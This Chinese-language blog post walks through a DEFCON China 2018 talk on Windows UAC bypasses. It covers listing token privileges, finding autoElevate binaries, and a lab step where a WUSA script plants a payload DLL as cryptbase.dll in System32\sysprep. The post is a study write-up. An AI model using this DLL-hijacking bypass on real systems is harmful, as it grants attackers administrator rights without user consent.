DEFCON2018 CHINA(part:0x01)
<p dir="auto"><br />
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmXSVyBXMSmuej4ZyvRNNFvMNzKTnDbQ8n6edYcNqU69ik/11111.png" alt="11111.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmXSVyBXMSmuej4ZyvRNNFvMNzKTnDbQ8n6edYcNqU69ik/11111.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmXSVyBXMSmuej4ZyvRNNFvMNzKTnDbQ8n6edYcNqU69ik/11111.png 2x" />
<p dir="auto">DEFCON CHINA 行 已经结束两天了 总与有时间研究下大佬们分享的文章了。
<p dir="auto">这次要学习的是 Ruben Boonen(b33f)大佬分享的内容
<p dir="auto"><a href="https://github.com/FuzzySecurity" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">大佬GitHub
<p dir="auto">这次b33f大佬的议题是:<br />
UAC 0day ,all day!<br />
用户账户控制,每天都是0day。
<h4>0x01: 一些基本概念
<p dir="auto"><br /><br />
<a href="https://en.wikipedia.org/wiki/User_Account_Control" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">User Account Control
<p dir="auto"><a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">AppLocker
<p dir="auto"><a href="https://github.com/FuzzySecurity" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">脚本都在这里找到
<h4>0x002: 用到的一些脚本的功能
<p dir="auto"><br /><br />
脚本大部分是基于powershell的 我的环境是win7x64位下:
<p dir="auto"><em>Get-TokenPrivs.ps1
<p dir="auto">Get-TokenPrivs -ProcID 3052
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmRNzi7xDDqYFR9FgYUSrvJR38ZN5VhDHAc5UjKzFyeNkj/1112.png" alt="1112.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmRNzi7xDDqYFR9FgYUSrvJR38ZN5VhDHAc5UjKzFyeNkj/1112.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmRNzi7xDDqYFR9FgYUSrvJR38ZN5VhDHAc5UjKzFyeNkj/1112.png 2x" />
<p dir="auto">使用得到如上图所示,其作用是:
<p dir="auto">打开进程的句柄,并调用Advapi32 :: GetTokenInformation列出与进程相关联的特权。
<p dir="auto">这次使用的还有如下脚本 ,使用方法都类似,而且很多工具都有类似的功能 就不一个一个介绍了:
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmY2beQtApaxKpnNfpD5M74WceVFP4Tx2uXmgcKqVxdENr/1113.png" alt="1113.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmY2beQtApaxKpnNfpD5M74WceVFP4Tx2uXmgcKqVxdENr/1113.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmY2beQtApaxKpnNfpD5M74WceVFP4Tx2uXmgcKqVxdENr/1113.png 2x" />
<h4>0x03:查找自动提权 Get-AutoElevate
<p dir="auto"><br />
<p dir="auto">有很多种方法:比如使用String.exe( Sysinternals Strings )
<pre><code>strings.exe -s *.exe | findstr /i "autoElevate"
<p dir="auto"><a href="https://technet.microsoft.com/zh-cn/library/2009.07.uac.aspx" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">一些使用看这里
<p dir="auto">也可以使用 Sigcheck.exe 查看指定的 或者使用powershell内定函数
<pre><code>C:\Users\evil0x00\Desktop\0Day\0Day\DefCon-Tools>sigcheck64.exe -m c:\Windows\sy
stem32\taskmgr.exe
或者:
Get-Content -Path C:\Windows\System32\Taskmgr.exe | Select-String -Pattern "autoElevate"
<p dir="auto">同时大佬提供的也有脚本
<p dir="auto"><em>Get-AutoElevate.ps1
<pre><code> Get-AutoElevate -Path C:\Windows\System32\ -MaxDepth 1
<p dir="auto">查询结果如下:
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmWJSiG5YoQNHP8YK3MDwJzzy6dCxpiE8YxZXALqUtwDhv/1114.png" alt="1114.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmWJSiG5YoQNHP8YK3MDwJzzy6dCxpiE8YxZXALqUtwDhv/1114.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmWJSiG5YoQNHP8YK3MDwJzzy6dCxpiE8YxZXALqUtwDhv/1114.png 2x" />
<h4>0x04 绕过UAC创建文件
<p dir="auto">这个是由WUSA来绕过的。
<p dir="auto">正常情况下 在此目录下新建文件是不允许的,必须提升到管理员权限。如下图所示:
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmVdPY6RaV14GReco3EoRtwCJtStvKe2qohe5VWGZPjBKp/sysprep.png" alt="sysprep.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmVdPY6RaV14GReco3EoRtwCJtStvKe2qohe5VWGZPjBKp/sysprep.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmVdPY6RaV14GReco3EoRtwCJtStvKe2qohe5VWGZPjBKp/sysprep.png 2x" />
<p dir="auto">使用大佬提供的脚本 直接执行 如下:
<pre><code>=========================================[Lab1 - WUSA]
- Filter: NAME NOT FOUND, High Integrity, Path end in ".dll"
- Elevated-WUSA -Payload C:\DefCon-Tools\Yamabiko\yamabiko-x64.dll -DestinationPath C:\Windows\System32\sysprep\ -DestinationName cryptbase.dll
<p dir="auto">执行如下:
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmTG2hEAxXG1JYD3VGVCiXkDtwxr2US4zLks7wtqXzT9Fm/1.png" alt="1.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmTG2hEAxXG1JYD3VGVCiXkDtwxr2US4zLks7wtqXzT9Fm/1.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmTG2hEAxXG1JYD3VGVCiXkDtwxr2US4zLks7wtqXzT9Fm/1.png 2x" />
<p dir="auto">可以看到成功创建了dll 写入了文件
<h4>0x05
<p dir="auto">这次就先写到这 剩下的看下一篇文章
买不起票系列
开玩笑
666
em...
公司给了票 太远没去
错过了好机会
想去看 没票
下次去
哇 我也去了
下次面基